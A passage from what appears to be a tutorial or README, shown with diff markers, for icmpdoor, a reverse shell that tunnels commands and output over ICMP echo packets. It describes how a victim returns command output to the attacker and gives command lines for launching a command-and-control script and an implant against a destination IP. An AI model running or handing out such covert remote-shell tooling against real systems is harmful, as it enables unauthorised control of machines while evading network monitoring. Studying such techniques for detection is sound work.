 3) The victim sends the output of the hostname command ubuntu2040 back to the attacker’s machine over ICMP echo-reply (code 0) with the same ICMP ID 13170.

 icmpdoor does not time-out automatically because it does not establish a socket.
-Instead, this reverse shell is connectionless due to the nature of how the ICMP protocol works.
+Instead, this interactive shell is connectionless due to the nature of how the ICMP protocol works.
 This technique works with global routable IP's (WAN connections).

 You can pull icmpdoor from my GitHub repository.
 Pre-compiled stand-alone binaries for Windows 10 and Linux are also available from the same repo.

 ./icmp-cnc.py -i INTERFACE -d DESTINATION_IP (Command & Control (C2)) ./icmpdoor.py -i INTERFACE -d DESTINATION_IP (Implant)

 Do note that this ICMP reverse shell is unencrypted and does not use (base64) encoding: